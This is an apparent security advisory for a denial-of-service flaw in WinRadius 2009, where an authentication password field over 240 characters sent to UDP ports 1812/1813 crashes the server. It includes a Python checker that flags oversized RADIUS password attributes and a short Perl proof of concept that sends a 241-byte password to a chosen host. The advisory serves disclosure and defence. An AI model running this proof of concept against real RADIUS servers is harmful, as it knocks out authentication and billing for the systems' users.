Affected Systems:
WinRadius 2009
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53702
WinRadius is commercial software from China for dial-up authentication, accounting and billing, built on the standard RADIUS protocol.
A denial-of-service vulnerability exists in the implementation in versions earlier than WinRadius 2009. The WinRadius server listens on UDP ports 1812 and 1813 but does not limit the size of the authentication field; by sending more than 240 characters, an attacker can crash the server.
<* Source: demonalex
Link: http://www.securityfocus.com/archive/1/522878
*>
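As an added defender-side check, not part of this advisory or demonalex's PoC: the Python below parses the attribute list of a RADIUS datagram and flags a User-Password attribute longer than the 128-byte ceiling of RFC 2865 (the 241-character field described above is well past it), or any attribute whose declared length runs past the packet, so a filtering front end or IDS rule for UDP 1812/1813 can drop such requests before a server parses them. The packet builder and its sample values are constructed for illustration and skip the RADIUS password obfuscation, since only the framing is checked.

```python
import struct

ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
# RFC 2865 section 5.2: a User-Password attribute is 18..130 octets,
# i.e. a 2-byte header plus at most 128 value bytes.
MAX_USER_PASSWORD_VALUE = 128


def parse_attributes(pkt: bytes):
    """Yield (type, value) for each attribute; raise ValueError on broken framing."""
    if len(pkt) < 20:
        raise ValueError("shorter than the 20-byte RADIUS header")
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if length < 20 or length > len(pkt):
        raise ValueError(f"header Length {length} does not fit {len(pkt)} received bytes")
    pos = 20
    while pos < length:
        if length - pos < 2:
            raise ValueError("trailing bytes too short for an attribute header")
        atype, alen = pkt[pos], pkt[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError(f"attribute {atype} declares length {alen} past the packet end")
        yield atype, pkt[pos + 2:pos + alen]
        pos += alen


def check_radius_request(pkt: bytes) -> list:
    """Return findings for one datagram received on UDP 1812/1813; [] means it looks sane."""
    try:
        attrs = list(parse_attributes(pkt))
    except ValueError as exc:
        return [f"malformed: {exc}"]
    findings = []
    for atype, value in attrs:
        if atype == ATTR_USER_PASSWORD and len(value) > MAX_USER_PASSWORD_VALUE:
            findings.append(f"User-Password value is {len(value)} bytes, "
                            f"above the RFC 2865 ceiling of {MAX_USER_PASSWORD_VALUE}")
    return findings


def build_access_request(username: bytes, password_field: bytes) -> bytes:
    """Constructed sample Access-Request (code 1, zero Authenticator). The password
    field is placed raw, not RADIUS-obfuscated, because only framing is checked here."""
    attrs = bytes([ATTR_USER_NAME, 2 + len(username)]) + username
    attrs += bytes([ATTR_USER_PASSWORD, 2 + len(password_field)]) + password_field
    return struct.pack("!BBH", 1, 0, 20 + len(attrs)) + bytes(16) + attrs


if __name__ == "__main__":
    print(check_radius_request(build_access_request(b"bob", bytes(16))))   # []
    print(check_radius_request(build_access_request(b"123", b"A" * 241)))  # one finding
```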
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
Demonalex () provides the following test method:
-----------------------------------------------------------
#!/usr/bin/perl
# PoC by demonalex: sends one Access-Request whose password field is 241 bytes long
use strict;
use warnings;
use Authen::Simple::RADIUS;

$| = 1;
my $host = shift || die "usage: $0 host\n";
print "Launch Attack...\n";

# random three-digit user name and shared secret; their values do not matter
my $username = int(rand(10)) . int(rand(10)) . int(rand(10));
my $password = 'A' x 241;    # exceeds the 240-character limit described above
my $secret   = int(rand(10)) . int(rand(10)) . int(rand(10));

my $radius = Authen::Simple::RADIUS->new(
    host   => $host,
    secret => $secret,
);
$radius->authenticate($username, $password);
print "Finish!\n";
exit(1);
-----------------------------------------------------------
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
WinRadius
---------
The vendor has not yet released a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
http://www.elite-school.com/saas/WinRadius/